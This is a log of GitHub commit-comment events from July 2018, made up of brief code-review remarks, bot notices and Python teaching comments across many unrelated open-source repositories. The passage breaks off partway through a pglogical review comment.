{"id":"7910692175","type":"CommitCommentEvent","actor":{"login":"satishgoda"},"repo":{"name":"7ssaa/training"},"payload":{"comment":{"id":29576272,"position":13,"line":13,"path":"test1.py","commit_id":"6e1b511e7bef5856cbfb2f2e44ba3e0e85f38024","created_at":"2018-07-03T07:16:51Z","updated_at":"2018-07-03T07:16:51Z","author_association":"NONE","body":"```def``` is a Python keyword used to define a function. A function is a block of Python statements. Indentation is used to group the block of Python statements. It is suggested to use 4 spaces per indent (Configure it in your text editor of choice)"}},"created_at":"2018-07-03T07:16:51Z"}
{"id":"7910692510","type":"CommitCommentEvent","actor":{"login":"whoodes"},"repo":{"name":"whoodes/Library"},"payload":{"comment":{"id":29576273,"position":null,"line":null,"path":null,"commit_id":"23cc51ec385f8e23ac1936aa4a64914d003eaf10","created_at":"2018-07-03T07:16:56Z","updated_at":"2018-07-03T07:16:56Z","author_association":"OWNER","body":"Disregard this commit."}},"created_at":"2018-07-03T07:16:56Z"}
{"id":"7910694506","type":"CommitCommentEvent","actor":{"login":"adamgreen"},"repo":{"name":"Tiogaplanet/MiP_ProMini-Pack"},"payload":{"comment":{"id":29576277,"position":59,"line":1689,"path":"Arduino/MiP_ProMini_Pack_Library/src/mip.cpp","commit_id":"7fc41f6923bbeff6da944f54669237e9327d1fd1","created_at":"2018-07-03T07:17:24Z","updated_at":"2018-07-03T07:17:24Z","author_association":"NONE","body":"Should you add a public readGamerMode() API like this or instead copy the existing gesture/radar APIs and have **bool** returning functions like ```bool isRoamModeEnabled()```? "}},"created_at":"2018-07-03T07:17:24Z"}
{"id":"7910696210","type":"CommitCommentEvent","actor":{"login":"satishgoda"},"repo":{"name":"7ssaa/training"},"payload":{"comment":{"id":29576283,"position":14,"line":14,"path":"test1.py","commit_id":"6e1b511e7bef5856cbfb2f2e44ba3e0e85f38024","created_at":"2018-07-03T07:17:49Z","updated_at":"2018-07-03T07:17:49Z","author_association":"NONE","body":"This is a function level documentation string. Typing ```help(changecolor)``` would print anything that is typed in the documentation string."}},"created_at":"2018-07-03T07:17:49Z"}
{"id":"7910696889","type":"CommitCommentEvent","actor":{"login":"younghankss"},"repo":{"name":"behumble/showlicense"},"payload":{"comment":{"id":29576285,"position":21,"line":45,"path":"pom.xml","commit_id":"d9311b9491ab3820b5c369c25f27d6664cd0a587","created_at":"2018-07-03T07:17:58Z","updated_at":"2018-07-03T07:17:58Z","author_association":"NONE","body":"Merrr"}},"created_at":"2018-07-03T07:17:58Z"}
{"id":"7910700832","type":"CommitCommentEvent","actor":{"login":"conda-forge-linter"},"repo":{"name":"conda-forge/py-lz4framed-feedstock"},"payload":{"comment":{"id":29576292,"position":null,"line":null,"path":null,"commit_id":"b365a897884d921f722f8deaa01bc9070ecd46ed","created_at":"2018-07-03T07:18:54Z","updated_at":"2018-07-03T07:18:54Z","author_association":"NONE","body":"\nHi! This is the friendly automated conda-forge-webservice.\n\nI updated the Github team because of this commit.\n\n- @timchurchard were added to conda-forge. Welcome to conda-forge!\"\n  Go to https://github.com/orgs/conda-forge/invitation see your invitation.\n\n- @timchurchard were added to this feedstock maintenance team.\n  You should get push access to this feedstock and CI services.\n\nFeel free to join the community [chat room](https://gitter.im/conda-forge/conda-forge.github.io).\n\nNOTE: Please make sure to not push to the repository directly.\n      Use branches in your fork for any changes and send a PR.\n      More details [here](https://conda-forge.org/docs/conda-forge_gotchas.html#using-a-fork-vs-a-branch-when-updating-a-recipe)\n"}},"created_at":"2018-07-03T07:18:54Z"}
{"id":"7910701833","type":"CommitCommentEvent","actor":{"login":"djc"},"repo":{"name":"djahandarie/tokio-imap"},"payload":{"comment":{"id":29576296,"position":null,"line":null,"path":null,"commit_id":"48b881720c5e37acdf72f7b37bcc626018aa35d5","created_at":"2018-07-03T07:19:09Z","updated_at":"2018-07-03T07:19:09Z","author_association":"NONE","body":"This looks pretty good! Are you planning on sending a PR? :wink:"}},"created_at":"2018-07-03T07:19:09Z"}
{"id":"7910702720","type":"CommitCommentEvent","actor":{"login":"satishgoda"},"repo":{"name":"7ssaa/training"},"payload":{"comment":{"id":29576297,"position":15,"line":15,"path":"test1.py","commit_id":"6e1b511e7bef5856cbfb2f2e44ba3e0e85f38024","created_at":"2018-07-03T07:19:21Z","updated_at":"2018-07-03T07:19:21Z","author_association":"NONE","body":"We are storing a bunch of strings in a tuple object."}},"created_at":"2018-07-03T07:19:21Z"}
{"id":"7910706600","type":"CommitCommentEvent","actor":{"login":"bhargavi007"},"repo":{"name":"RuthviReddy/Blog-app"},"payload":{"comment":{"id":29576301,"position":122,"line":122,"path":"app.js","commit_id":"39e979fcf98cc3201d7ab1c6980da1a77241e6e9","created_at":"2018-07-03T07:20:16Z","updated_at":"2018-07-03T07:20:16Z","author_association":"NONE","body":"If you can get the image of the user from the profile data, save the image of the user "}},"created_at":"2018-07-03T07:20:16Z"}
{"id":"7910709378","type":"CommitCommentEvent","actor":{"login":"israelwei"},"repo":{"name":"israelwei/Retina"},"payload":{"comment":{"id":29576311,"position":null,"line":null,"path":null,"commit_id":"0802d72a8becf2ef0f93e78aa040d9fa4eb2eeb0","created_at":"2018-07-03T07:20:56Z","updated_at":"2018-07-03T07:20:56Z","author_association":"OWNER","body":"Binary classification - training"}},"created_at":"2018-07-03T07:20:56Z"}
{"id":"7910710841","type":"CommitCommentEvent","actor":{"login":"satishgoda"},"repo":{"name":"7ssaa/training"},"payload":{"comment":{"id":29576317,"position":16,"line":16,"path":"test1.py","commit_id":"6e1b511e7bef5856cbfb2f2e44ba3e0e85f38024","created_at":"2018-07-03T07:21:18Z","updated_at":"2018-07-03T07:21:18Z","author_association":"NONE","body":"``if`` is Python conditional statement.\r\n\r\n```color in valid_colors``` returns a bool value, ```True``` or ```False```. ```if``` will execute its body of statements when ```True```, otherwise, the block of statements under ```else``` will be executed."}},"created_at":"2018-07-03T07:21:18Z"}
{"id":"7910711404","type":"CommitCommentEvent","actor":{"login":"satishgoda"},"repo":{"name":"7ssaa/training"},"payload":{"comment":{"id":29576318,"position":17,"line":17,"path":"test1.py","commit_id":"6e1b511e7bef5856cbfb2f2e44ba3e0e85f38024","created_at":"2018-07-03T07:21:26Z","updated_at":"2018-07-03T07:21:26Z","author_association":"NONE","body":"```if``` statements can be nested."}},"created_at":"2018-07-03T07:21:26Z"}
{"id":"7910717022","type":"CommitCommentEvent","actor":{"login":"anouq"},"repo":{"name":"anouq/nst-app"},"payload":{"comment":{"id":29576325,"position":null,"line":null,"path":null,"commit_id":"506584716a86e364ec361c503eea090e99320acd","created_at":"2018-07-03T07:22:44Z","updated_at":"2018-07-03T07:22:44Z","author_association":"OWNER","body":"IBM Cloud [toolchain](https://console.ng.bluemix.net/devops/toolchains/fa99ec10-e3b9-4c1d-ab1c-a4819ce2d156?env_id=ibm%3Ayp%3Aus-south \"blockchain2006\"): [Delivery Pipeline](https://console.ng.bluemix.net/devops/pipelines/43fe1752-afe0-4f07-bb5f-953b349296b5?env_id=ibm%3Ayp%3Aus-south \"nst-app2006\") deployed [nst-app](https://github.com/anouq/nst-app/releases/tag/deploy-ibm-yp-us-south-philip.kooijman-ns.nl-Blockchain-20180703-072243 \"deploy-ibm-yp-us-south-philip.kooijman-ns.nl-Blockchain-20180703-072243\") to [Blockchain](https://console.bluemix.net/apps/ce8490e0-4f8b-4923-bf32-81bf0d8c2ebc?env_id=ibm:yp:us-south \"ibm:yp:us-south:philip.kooijman@ns.nl:Blockchain\"), including this commit"}},"created_at":"2018-07-03T07:22:44Z"}
{"id":"7910719910","type":"CommitCommentEvent","actor":{"login":"Yann-lms"},"repo":{"name":"Yann-lms/arm-trusted-firmware"},"payload":{"comment":{"id":29576327,"position":597,"line":597,"path":"drivers/mmc/mmc.c","commit_id":"332fc1d6070bd7bae7e382e3630a55df87aed228","created_at":"2018-07-03T07:23:24Z","updated_at":"2018-07-03T07:23:24Z","author_association":"OWNER","body":"Right, I will change that in the next version"}},"created_at":"2018-07-03T07:23:24Z"}
{"id":"7910744299","type":"CommitCommentEvent","actor":{"login":"romanz"},"repo":{"name":"romanz/electrs"},"payload":{"comment":{"id":29576372,"position":null,"line":null,"path":null,"commit_id":"1eb92f7372201552889c86e860a395892027312c","created_at":"2018-07-03T07:28:58Z","updated_at":"2018-07-03T07:28:58Z","author_association":"OWNER","body":"Following #5 "}},"created_at":"2018-07-03T07:28:58Z"}
{"id":"7910745168","type":"CommitCommentEvent","actor":{"login":"kalithas"},"repo":{"name":"kalithas/Odoo-Tryout"},"payload":{"comment":{"id":29576374,"position":null,"line":null,"path":null,"commit_id":"7ce1f9ac5329907375de232036b5519c9528aef0","created_at":"2018-07-03T07:29:11Z","updated_at":"2018-07-03T07:29:11Z","author_association":"OWNER","body":"dele"}},"created_at":"2018-07-03T07:29:11Z"}
{"id":"7910751153","type":"CommitCommentEvent","actor":{"login":"igorpecovnik"},"repo":{"name":"armbian/build"},"payload":{"comment":{"id":29576389,"position":null,"line":null,"path":null,"commit_id":"ede66919cf0d18783a9b2ee2ee67c7fbf2f5d19f","created_at":"2018-07-03T07:30:28Z","updated_at":"2018-07-03T07:30:28Z","author_association":"MEMBER","body":"I have this same board. eMMC, if exists, should probably work after this and if it's enabled in a config. @StefanMavrodiev Are there boards with eMMC or are NAND only?"}},"created_at":"2018-07-03T07:30:28Z"}
{"id":"7910752355","type":"CommitCommentEvent","actor":{"login":"JerryShea"},"repo":{"name":"OpenHFT/Chronicle-Queue"},"payload":{"comment":{"id":29576392,"position":null,"line":null,"path":null,"commit_id":"3c77e05b5db823df8f6d972a8dae9a7a13bce231","created_at":"2018-07-03T07:30:43Z","updated_at":"2018-07-03T07:30:43Z","author_association":"CONTRIBUTOR","body":"That was quick!"}},"created_at":"2018-07-03T07:30:43Z"}
{"id":"7910753102","type":"CommitCommentEvent","actor":{"login":"satishgoda"},"repo":{"name":"7ssaa/training"},"payload":{"comment":{"id":29576396,"position":24,"line":24,"path":"test1.py","commit_id":"6e1b511e7bef5856cbfb2f2e44ba3e0e85f38024","created_at":"2018-07-03T07:30:54Z","updated_at":"2018-07-03T07:30:54Z","author_association":"NONE","body":"[-1] returns the last element of the sequence."}},"created_at":"2018-07-03T07:30:54Z"}
{"id":"7910754135","type":"CommitCommentEvent","actor":{"login":"RealyUniqueName"},"repo":{"name":"HaxeFoundation/haxe"},"payload":{"comment":{"id":29576402,"position":34,"line":34,"path":"std/php/_std/haxe/ds/Vector.hx","commit_id":"4a7a9bf57005e634711ee8735a886fc6d0c6a0b7","created_at":"2018-07-03T07:31:09Z","updated_at":"2018-07-03T07:31:09Z","author_association":"MEMBER","body":"The problem is that native arrays on PHP are passed by copy. So I need a container anyway."}},"created_at":"2018-07-03T07:31:09Z"}
{"id":"7910757879","type":"CommitCommentEvent","actor":{"login":"oberon-manjaro"},"repo":{"name":"Chrysostomus/manjaro-architect"},"payload":{"comment":{"id":29576415,"position":null,"line":null,"path":null,"commit_id":"3117d31410ffa16a0ef169f6e97cb3547f2bf3ca","created_at":"2018-07-03T07:31:55Z","updated_at":"2018-07-03T07:31:55Z","author_association":"COLLABORATOR","body":"I had already repackaged a 0.9.13 last night sourcing manjaro-architect code on gitlab where Stefano had already made the correct adjustments and pushed an updated PKGBUILD to **gitlab.manjaro.org/packages/extra/manjaro-architect**. Did you not receive my email about that? \r\nOk for you that we move development also for m-a to gitlab? I thought that was the plan..."}},"created_at":"2018-07-03T07:31:55Z"}
{"id":"7910760019","type":"CommitCommentEvent","actor":{"login":"satishgoda"},"repo":{"name":"7ssaa/training"},"payload":{"comment":{"id":29576422,"position":26,"line":26,"path":"test1.py","commit_id":"6e1b511e7bef5856cbfb2f2e44ba3e0e85f38024","created_at":"2018-07-03T07:32:25Z","updated_at":"2018-07-03T07:32:25Z","author_association":"NONE","body":"We are adding three strings together ```'a' + 'b' + 'c' gives 'abc'```\r\n\r\n```', '.join(['a', 'b', 'c']) gives 'a, b, c'```"}},"created_at":"2018-07-03T07:32:25Z"}
{"id":"7910760255","type":"CommitCommentEvent","actor":{"login":"itbj"},"repo":{"name":"itbj/country-flags"},"payload":{"comment":{"id":29576424,"position":null,"line":null,"path":null,"commit_id":"7f73a1cf0f67598ed99936875e3bb3966f5f1006","created_at":"2018-07-03T07:32:28Z","updated_at":"2018-07-03T07:32:28Z","author_association":"OWNER","body":"Zambia,赞比亚"}},"created_at":"2018-07-03T07:32:28Z"}
{"id":"7910761280","type":"CommitCommentEvent","actor":{"login":"keyonjie"},"repo":{"name":"thesofproject/soft"},"payload":{"comment":{"id":29576431,"position":null,"line":null,"path":null,"commit_id":"229da95e0d5a9d8abce89a5bb3804926b74d1ba0","created_at":"2018-07-03T07:32:42Z","updated_at":"2018-07-03T07:32:42Z","author_association":"CONTRIBUTOR","body":"I suppose #11 is already fixed/closed?"}},"created_at":"2018-07-03T07:32:42Z"}
{"id":"7910761973","type":"CommitCommentEvent","actor":{"login":"jeromedockes"},"repo":{"name":"nilearn/nilearn"},"payload":{"comment":{"id":29576434,"position":null,"line":null,"path":null,"commit_id":"1e33ec1600236e52228aa7f6c3fd34a2a46d78c1","created_at":"2018-07-03T07:32:52Z","updated_at":"2018-07-03T07:32:52Z","author_association":"CONTRIBUTOR","body":"assert_warns is actually imported from this module by other modules. good catch by @KamalakerDadi "}},"created_at":"2018-07-03T07:32:52Z"}
{"id":"7910762699","type":"CommitCommentEvent","actor":{"login":"satishgoda"},"repo":{"name":"7ssaa/training"},"payload":{"comment":{"id":29576436,"position":29,"line":29,"path":"test1.py","commit_id":"6e1b511e7bef5856cbfb2f2e44ba3e0e85f38024","created_at":"2018-07-03T07:33:02Z","updated_at":"2018-07-03T07:33:02Z","author_association":"NONE","body":"We are adding an attribute called ```times``` on the function ```changecolor```"}},"created_at":"2018-07-03T07:33:02Z"}
{"id":"7910766595","type":"CommitCommentEvent","actor":{"login":"cjluonuro"},"repo":{"name":"bazelbuild/bazel"},"payload":{"comment":{"id":29576445,"position":null,"line":null,"path":null,"commit_id":"b20c10768a3abdc1be3ef142e33654c985fe690b","created_at":"2018-07-03T07:33:53Z","updated_at":"2018-07-03T07:33:53Z","author_association":"NONE","body":"Is it possible that you remove --spawn_strategy=standalone?"}},"created_at":"2018-07-03T07:33:53Z"}
{"id":"7910769446","type":"CommitCommentEvent","actor":{"login":"bhargavi007"},"repo":{"name":"RuthviReddy/Blog-app"},"payload":{"comment":{"id":29576451,"position":457,"line":457,"path":"app.js","commit_id":"39e979fcf98cc3201d7ab1c6980da1a77241e6e9","created_at":"2018-07-03T07:34:29Z","updated_at":"2018-07-03T07:34:29Z","author_association":"NONE","body":"add updatedTime "}},"created_at":"2018-07-03T07:34:29Z"}
{"id":"7910771797","type":"CommitCommentEvent","actor":{"login":"Ephigenia"},"repo":{"name":"michalschott/circleboard2"},"payload":{"comment":{"id":29576453,"position":null,"line":null,"path":null,"commit_id":"ef090d4d27aeec36a47e12220c84d95b48cc0f8d","created_at":"2018-07-03T07:34:58Z","updated_at":"2018-07-03T07:34:58Z","author_association":"NONE","body":"@michalschott there’s allready a dockerfile in the \"development\" branch of circleboard2. Please check if that would be adequate for your needs. I still need to fix some code-specific stuff in the development branch that’s why it’s not in master right now."}},"created_at":"2018-07-03T07:34:58Z"}
{"id":"7910772391","type":"CommitCommentEvent","actor":{"login":"uellendahl"},"repo":{"name":"uellendahl/test"},"payload":{"comment":{"id":29576456,"position":null,"line":null,"path":null,"commit_id":"d6a67e56531528d1a86a001b703177e4f960f540","created_at":"2018-07-03T07:35:07Z","updated_at":"2018-07-03T07:35:07Z","author_association":"OWNER","body":"Commit on GitHub"}},"created_at":"2018-07-03T07:35:07Z"}
{"id":"7910778979","type":"CommitCommentEvent","actor":{"login":"tobyjamez"},"repo":{"name":"bombrun/GaiaLab"},"payload":{"comment":{"id":29576475,"position":null,"line":null,"path":null,"commit_id":"2f272c26eb8566486bcbc0ad8155b78a9aeeeddb","created_at":"2018-07-03T07:36:36Z","updated_at":"2018-07-03T07:36:36Z","author_association":"COLLABORATOR","body":"I'm not fully convinced this completely (or rigorously) fixes the problem but I think it should prove adequate."}},"created_at":"2018-07-03T07:36:36Z"}
{"id":"7910783270","type":"CommitCommentEvent","actor":{"login":"katarina11x"},"repo":{"name":"IBM/nlc-icd10-classifier"},"payload":{"comment":{"id":29576486,"position":null,"line":null,"path":null,"commit_id":"9694b13b5dd7b7140ad22ea3fb26874137daed3b","created_at":"2018-07-03T07:37:33Z","updated_at":"2018-07-03T07:37:33Z","author_association":"NONE","body":"https://github.com/IBM/nlc-icd10-classifier/commit/9694b13b5dd7b7140ad22ea3fb26874137daed3b#diff-252e75d3016998880ce5ac6015639c7c"}},"created_at":"2018-07-03T07:37:33Z"}
{"id":"7910784021","type":"CommitCommentEvent","actor":{"login":"jrieken"},"repo":{"name":"Microsoft/vscode"},"payload":{"comment":{"id":29576488,"position":8,"line":334,"path":"src/vs/workbench/api/node/extHostWorkspace.ts","commit_id":"b0fd77e9ff3c310b41f898a6bbccfc56710ead81","created_at":"2018-07-03T07:37:43Z","updated_at":"2018-07-03T07:37:43Z","author_association":"MEMBER","body":"@bpasero @weinand fyi `readonly foo:Foo[]` is not the same as `readonly foo: ReadonlyArray<Foo>`. When compiling to es6 this is actually caught. I have pushed this change to correctly implement the API, we can consider changing the API here."}},"created_at":"2018-07-03T07:37:43Z"}
{"id":"7910786105","type":"CommitCommentEvent","actor":{"login":"GanterPenguin"},"repo":{"name":"Jyrs/Website"},"payload":{"comment":{"id":29576493,"position":null,"line":null,"path":null,"commit_id":"b784cca5f0575c897967548e79223016f6db9574","created_at":"2018-07-03T07:38:13Z","updated_at":"2018-07-03T07:38:13Z","author_association":"COLLABORATOR","body":"Ставлю лайк"}},"created_at":"2018-07-03T07:38:13Z"}
{"id":"7910786928","type":"CommitCommentEvent","actor":{"login":"ringerc"},"repo":{"name":"pashagolub/pglogical"},"payload":{"comment":{"id":29576494,"position":null,"line":null,"path":null,"commit_id":"3b0c72c48d78b2d6071e1c7d45178bf32d7a8dd1","created_at":"2018-07-03T07:38:23Z","updated_at":"2018-07-03T07:38:23Z","author_association":"NONE","body":"I think you've backported the changes from the version committed upstream into pgl, right? Good call."}},"created_at":"2018-07-03T07:38:23Z"}
{"id":"7910787331","type":"CommitCommentEvent","actor":{"login":"JamesH65"},"repo":{"name":"raspberrypi/documentation"},"payload":{"comment":{"id":29576497,"position":null,"line":null,"path":null,"commit_id":"3556e2af6b7e5851c89620ef92d42ae335e73626","created_at":"2018-07-03T07:38:28Z","updated_at":"2018-07-03T07:38:28Z","author_association":"CONTRIBUTOR","body":"Simply there for completeness/archival purposes."}},"created_at":"2018-07-03T07:38:28Z"}
{"id":"7910787890","type":"CommitCommentEvent","actor":{"login":"pascalgrimaud"},"repo":{"name":"jhipster/generator-jhipster"},"payload":{"comment":{"id":29576500,"position":null,"line":null,"path":null,"commit_id":"db1849f5062936fce2c33056f809fe30346a3370","created_at":"2018-07-03T07:38:36Z","updated_at":"2018-07-03T07:38:36Z","author_association":"MEMBER","body":"yes, already on my TODO list"}},"created_at":"2018-07-03T07:38:36Z"}
{"id":"7910788070","type":"CommitCommentEvent","actor":{"login":"bhargavi007"},"repo":{"name":"RuthviReddy/Blog-app"},"payload":{"comment":{"id":29576501,"position":42,"line":42,"path":"signin.html","commit_id":"39e979fcf98cc3201d7ab1c6980da1a77241e6e9","created_at":"2018-07-03T07:38:38Z","updated_at":"2018-07-03T07:38:38Z","author_association":"NONE","body":"Use CSS styling instead of using this spaces"}},"created_at":"2018-07-03T07:38:38Z"}
{"id":"7910788833","type":"CommitCommentEvent","actor":{"login":"emersion"},"repo":{"name":"swaywm/sway"},"payload":{"comment":{"id":29576502,"position":19,"line":933,"path":"sway/desktop/output.c","commit_id":"6d1870aa1cede95885e7162ee75cd7fd29f2af23","created_at":"2018-07-03T07:38:47Z","updated_at":"2018-07-03T07:38:47Z","author_association":"MEMBER","body":"You can probably use `pixman_region32_contains_rectangle` instead."}},"created_at":"2018-07-03T07:38:47Z"}
{"id":"7910789640","type":"CommitCommentEvent","actor":{"login":"christhomas"},"repo":{"name":"yakotta/periodic-table"},"payload":{"comment":{"id":29576503,"position":50,"line":59,"path":"script.js","commit_id":"7ba718466c83bceb4ee32c58de60413742fdabe3","created_at":"2018-07-03T07:38:59Z","updated_at":"2018-07-03T07:38:59Z","author_association":"NONE","body":"You don't need to put $('.success') inside the not() function like this. \r\n\r\nThe not() function already takes a selector and it doesn't need a jquery object. Although of course, you can do it both ways and the way you have chosen works. You can simplify this and other code you might have followed the same pattern in the following way:\r\n\r\n$('.cell').not('.success').addClass('.fail').removeClass('s d p f');\r\n\r\n"}},"created_at":"2018-07-03T07:38:59Z"}
{"id":"7910790995","type":"CommitCommentEvent","actor":{"login":"davosmith"},"repo":{"name":"moodle/moodle"},"payload":{"comment":{"id":29576506,"position":10,"line":28,"path":"user/profile/lib.php","commit_id":"7a097efc43ba8976972ec1938792f01376fc9f1b","created_at":"2018-07-03T07:39:15Z","updated_at":"2018-07-03T07:39:15Z","author_association":"CONTRIBUTOR","body":" Missing full-stop at the end of the comment - worth fixing to avoid CI errors."}},"created_at":"2018-07-03T07:39:15Z"}
{"id":"7910791160","type":"CommitCommentEvent","actor":{"login":"michalschott"},"repo":{"name":"michalschott/circleboard2"},"payload":{"comment":{"id":29576507,"position":null,"line":null,"path":null,"commit_id":"ef090d4d27aeec36a47e12220c84d95b48cc0f8d","created_at":"2018-07-03T07:39:18Z","updated_at":"2018-07-03T07:39:18Z","author_association":"OWNER","body":"@Ephigenia cheers, looks good! I just had to create one for demo purpose."}},"created_at":"2018-07-03T07:39:18Z"}
{"id":"7910791903","type":"CommitCommentEvent","actor":{"login":"ignatenkobrain"},"repo":{"name":"varlink/rust"},"payload":{"comment":{"id":29576510,"position":null,"line":null,"path":null,"commit_id":"b19e50128900d3aa10617e61f972217ec27c20e3","created_at":"2018-07-03T07:39:28Z","updated_at":"2018-07-03T07:39:28Z","author_association":"NONE","body":"Just FYI, if you don't care about windows, you can use symlinks"}},"created_at":"2018-07-03T07:39:28Z"}
{"id":"7910792407","type":"CommitCommentEvent","actor":{"login":"igorpecovnik"},"repo":{"name":"armbian/build"},"payload":{"comment":{"id":29576512,"position":null,"line":null,"path":null,"commit_id":"8fb0d6da7b81992443aafc114acda9ab5e50dde4","created_at":"2018-07-03T07:39:34Z","updated_at":"2018-07-03T07:39:34Z","author_association":"MEMBER","body":">Still, I don't know what is the purpose of this file, adding new channel parameters ?\r\n\r\nYes, it looks like channel restrictions/definitions.\r\n\r\n>Maybe we can add this file into firmware package ...\r\n\r\nWhen you find some working default, push it. "}},"created_at":"2018-07-03T07:39:34Z"}
{"id":"7910795741","type":"CommitCommentEvent","actor":{"login":"davosmith"},"repo":{"name":"moodle/moodle"},"payload":{"comment":{"id":29576519,"position":68,"line":441,"path":"user/profile/lib.php","commit_id":"7a097efc43ba8976972ec1938792f01376fc9f1b","created_at":"2018-07-03T07:40:19Z","updated_at":"2018-07-03T07:40:19Z","author_association":"CONTRIBUTOR","body":"If this should not be overwritten by child classes, then should it be declared 'final'? (CI is complaining about the 'internal' comment)"}},"created_at":"2018-07-03T07:40:19Z"}
{"id":"7910795833","type":"CommitCommentEvent","actor":{"login":"Ephigenia"},"repo":{"name":"michalschott/circleboard2"},"payload":{"comment":{"id":29576520,"position":null,"line":null,"path":null,"commit_id":"ef090d4d27aeec36a47e12220c84d95b48cc0f8d","created_at":"2018-07-03T07:40:20Z","updated_at":"2018-07-03T07:40:20Z","author_association":"NONE","body":"thanks :) nice to finally get some feedback. Good luck with the demo!"}},"created_at":"2018-07-03T07:40:20Z"}
{"id":"7910799021","type":"CommitCommentEvent","actor":{"login":"RealyUniqueName"},"repo":{"name":"HaxeFoundation/haxe"},"payload":{"comment":{"id":29576522,"position":34,"line":34,"path":"std/php/_std/haxe/ds/Vector.hx","commit_id":"4a7a9bf57005e634711ee8735a886fc6d0c6a0b7","created_at":"2018-07-03T07:41:01Z","updated_at":"2018-07-03T07:41:01Z","author_association":"MEMBER","body":"> I guess the reason of introducing this is to store the length? Looks like count() is O(1) anyway so maybe just use it?\r\n\r\nThe reason is also to reduce function invocation, because it's an expensive operation in php.\r\n"}},"created_at":"2018-07-03T07:41:01Z"}
{"id":"7910799686","type":"CommitCommentEvent","actor":{"login":"emersion"},"repo":{"name":"swaywm/sway"},"payload":{"comment":{"id":29576524,"position":5,"line":114,"path":"swaylock/main.c","commit_id":"6d1870aa1cede95885e7162ee75cd7fd29f2af23","created_at":"2018-07-03T07:41:10Z","updated_at":"2018-07-03T07:41:10Z","author_association":"MEMBER","body":"Since we use `CAIRO_FORMAT_ARGB32`, how can this return true?"}},"created_at":"2018-07-03T07:41:10Z"}
{"id":"7910800178","type":"CommitCommentEvent","actor":{"login":"StefanMavrodiev"},"repo":{"name":"armbian/build"},"payload":{"comment":{"id":29576525,"position":null,"line":null,"path":null,"commit_id":"ede66919cf0d18783a9b2ee2ee67c7fbf2f5d19f","created_at":"2018-07-03T07:41:17Z","updated_at":"2018-07-03T07:41:17Z","author_association":"CONTRIBUTOR","body":"Actually, we have pads for NAND flash, but latter we decided it's useless. We sell boards only with eMMC, either 4G or 16G. "}},"created_at":"2018-07-03T07:41:17Z"}
{"id":"7910800414","type":"CommitCommentEvent","actor":{"login":"exmackina"},"repo":{"name":"Irstea/collec"},"payload":{"comment":{"id":29576526,"position":null,"line":null,"path":null,"commit_id":"86f56bdab4c604a2f6643168dcfcc7757a2bd65e","created_at":"2018-07-03T07:41:20Z","updated_at":"2018-07-03T07:41:20Z","author_association":"COLLABORATOR","body":"Je dirais que c'est bien le caractère \"single quote\" (single quotation mark) qui générait ici un bug (car il terminait précipitamment la chaîne entre \"quotes\"). A partir du moment où le caractère ' apparaissait (même en séquence '' à ne pas confondre avec les double quotes \") cela créait le bug que ce soit en tant qu'apostrophe ou autre, par exemple : tube 'petit' \r\nNotez qu'un apostrophe peut être matérialisé par plusieurs caractères : ' (droit) ou ’ (oblique)\r\nLe premier posait problème tandis que le second, non."}},"created_at":"2018-07-03T07:41:20Z"}
{"id":"7910804862","type":"CommitCommentEvent","actor":{"login":"emersion"},"repo":{"name":"swaywm/sway"},"payload":{"comment":{"id":29576532,"position":20,"line":129,"path":"swaylock/main.c","commit_id":"6d1870aa1cede95885e7162ee75cd7fd29f2af23","created_at":"2018-07-03T07:42:19Z","updated_at":"2018-07-03T07:42:19Z","author_association":"MEMBER","body":"Instead we could set an infinite region when loading the image."}},"created_at":"2018-07-03T07:42:19Z"}
{"id":"7910805217","type":"CommitCommentEvent","actor":{"login":"william11zhu"},"repo":{"name":"william11zhu/Learn"},"payload":{"comment":{"id":29576535,"position":null,"line":null,"path":null,"commit_id":"6fb6cecbe95e3f5e73ec502aecf7209ab11472a0","created_at":"2018-07-03T07:42:24Z","updated_at":"2018-07-03T07:42:24Z","author_association":"OWNER","body":"merge"}},"created_at":"2018-07-03T07:42:24Z"}
{"id":"7910806693","type":"CommitCommentEvent","actor":{"login":"katarina11x"},"repo":{"name":"IBM/nlc-icd10-classifier"},"payload":{"comment":{"id":29576543,"position":null,"line":null,"path":null,"commit_id":"366602721aba52fb3d36a90d7702693f4604e4ae","created_at":"2018-07-03T07:42:44Z","updated_at":"2018-07-03T07:42:44Z","author_association":"NONE","body":"https://github.com/IBM/nlc-icd10-classifier/commit/366602721aba52fb3d36a90d7702693f4604e4ae#diff-252e75d3016998880ce5ac6015639c7c"}},"created_at":"2018-07-03T07:42:44Z"}
{"id":"7910807617","type":"CommitCommentEvent","actor":{"login":"turkertopal"},"repo":{"name":"xenerizes/models"},"payload":{"comment":{"id":29576544,"position":null,"line":null,"path":null,"commit_id":"4dfb5debc7c0831f2d4de6b23721033c244b0d2c","created_at":"2018-07-03T07:42:56Z","updated_at":"2018-07-03T07:42:56Z","author_association":"NONE","body":"Thanks @xenerizes I have spend fair amount of time on influxdb/kapacitor pages then tried to run your code on my data. I found udf settings on documentation confusing. There is only one example that uses socket and its done with go. If you can find some time to answer following questions it will be really helpful. Did you define udf on kapacitor.conf by udf.functions.arima using path to your python file or just pointing your socket file? If so how do you define the socket file before running the kapacitor? Thanks"}},"created_at":"2018-07-03T07:42:56Z"}
{"id":"7910808376","type":"CommitCommentEvent","actor":{"login":"emersion"},"repo":{"name":"swaywm/sway"},"payload":{"comment":{"id":29576547,"position":5,"line":114,"path":"swaylock/main.c","commit_id":"6d1870aa1cede95885e7162ee75cd7fd29f2af23","created_at":"2018-07-03T07:43:06Z","updated_at":"2018-07-03T07:43:06Z","author_association":"MEMBER","body":"Oh, right. It's the image, not the surface. So this probably won't work on PNG images?"}},"created_at":"2018-07-03T07:43:06Z"}
{"id":"7910811408","type":"CommitCommentEvent","actor":{"login":"ringerc"},"repo":{"name":"pashagolub/pglogical"},"payload":{"comment":{"id":29576553,"position":null,"line":null,"path":null,"commit_id":"9dc62ba16f842b08e6857377f801e07ecccc100a","created_at":"2018-07-03T07:43:45Z","updated_at":"2018-07-03T07:43:45Z","author_association":"NONE","body":"Aren't resource files typically generated by MSVC, or considered obsoleted by manifests? My Windows development-foo is a tad weak.\r\n\r\nSeems not: https://docs.microsoft.com/en-us/dotnet/framework/resources/creating-resource-files-for-desktop-apps, https://docs.microsoft.com/en-us/windows/desktop/menurc/about-resource-files\r\n\r\nIt's unclear whether `.restext` or `.rc` is preferred, or if they're different.\r\n\r\nI can't merge this as it stands; it needs PGDG copyright and needs to generate the version from `PGLOGICAL_VERSION` in `pglogical.h` via the `Makefile`, or supply a template that's filled by whatever build skeleton is used in the Windows builds. If you do in-tree builds with Pg's perl/msvc tools I'm not sure how/if that works.\r\n\r\nWe build pglogical for Windows with CMake here, so it's all a bit 